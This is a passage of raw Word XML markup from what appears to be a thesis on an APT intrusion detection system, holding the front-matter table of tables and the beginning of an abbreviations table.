        <w:r w:rsidR="008F0F14" w:rsidRPr="00C97D49">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Figure 3.6 Centralized Log Storage System architecture</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc484886358 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>52</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00FB2F32" w:rsidRDefault="00FB2F32" w:rsidP="00FB2F32">
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00C437AB" w:rsidRPr="00811A53">
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="17" w:name="_Toc483575481"/>
    </w:p>
    <w:p w:rsidR="00C44A6F" w:rsidRPr="00C40A43" w:rsidRDefault="00C44A6F" w:rsidP="00C40A43">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C40A43">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>TABLE OF TABLES</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C44A6F" w:rsidRPr="00C44A6F" w:rsidRDefault="00C44A6F" w:rsidP="00C44A6F"/>
    <w:p w:rsidR="008F0F14" w:rsidRDefault="00C44A6F">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:instrText xml:space="preserve"> TOC \h \z \c "Table" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc484886359" w:history="1">
        <w:r w:rsidR="008F0F14" w:rsidRPr="002B2850">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Table 2.1 Registry keys and their correlations.</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc484886359 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>6</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008F0F14" w:rsidRDefault="00345B0F">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc484886360" w:history="1">
        <w:r w:rsidR="008F0F14" w:rsidRPr="002B2850">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Table 2.2 List of Registry hives and their filenames on system disk.</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc484886360 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>7</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008F0F14" w:rsidRDefault="00345B0F">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc484886361" w:history="1">
        <w:r w:rsidR="008F0F14" w:rsidRPr="002B2850">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Table 2.3 Registry hive cells and their data types.</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc484886361 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>9</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008F0F14" w:rsidRDefault="00345B0F">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc484886362" w:history="1">
        <w:r w:rsidR="008F0F14" w:rsidRPr="002B2850">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Table 2.4 Root keys and their descriptions.</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc484886362 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>15</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008F0F14" w:rsidRDefault="00345B0F">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc484886363" w:history="1">
        <w:r w:rsidR="008F0F14" w:rsidRPr="002B2850">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Table 2.5 System Registry value types and their descriptions.</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc484886363 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>17</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008F0F14" w:rsidRDefault="00345B0F">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc484886364" w:history="1">
        <w:r w:rsidR="008F0F14" w:rsidRPr="002B2850">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Table 2.6 Service Registry values and descriptions</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc484886364 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>23</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008F0F14" w:rsidRDefault="00345B0F">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc484886365" w:history="1">
        <w:r w:rsidR="008F0F14" w:rsidRPr="002B2850">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Table 2.7 Graylog Collector Sidecar configuration parameters and their descriptions.</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc484886365 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>33</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008F0F14" w:rsidRDefault="00345B0F">
      <w:pPr>
        <w:pStyle w:val="TableofFigures"/>
        <w:tabs>
          <w:tab w:val="right" w:leader="dot" w:pos="8780"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:noProof/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc484886366" w:history="1">
        <w:r w:rsidR="008F0F14" w:rsidRPr="002B2850">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Table 4.1 dwFilter values and their meanings</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc484886366 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>57</w:t>
        </w:r>
        <w:r w:rsidR="008F0F14">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C44A6F" w:rsidRDefault="00C44A6F">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="567"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="003802AB" w:rsidRDefault="003725C1" w:rsidP="003725C1">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00600BA7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>TABLE OF ABBREVIATIONS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00877325" w:rsidRDefault="003725C1" w:rsidP="003725C1">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00600BA7">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4390"/>
        <w:gridCol w:w="4390"/>
      </w:tblGrid>
      <w:tr w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidTr="00F85F5E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRPr="00F85F5E" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F85F5E">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Abbreviation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D0CECE" w:themeFill="background2" w:themeFillShade="E6"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRPr="00F85F5E" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F85F5E">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Expansion</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidTr="00D26C9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>APC</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Asynchronous Procedure Calls</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidTr="00D26C9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>APT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Advanced Persistent Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidTr="00D26C9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>APTIDS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Advanced Persistent Threat Inspection Detection System</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidTr="00D26C9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>CLI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Command Line Interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidTr="00D26C9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>FIM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>File Integrity Monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidTr="00D26C9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>GUI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Graphical User Interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidTr="00D26C9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00865A00" w:rsidRPr="00D26C9E" w:rsidRDefault="00865A00" w:rsidP="00D26C9E">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:ind w:left="0" w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>HIDS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4390" w:type="dxa"/>
          </w:tcPr>
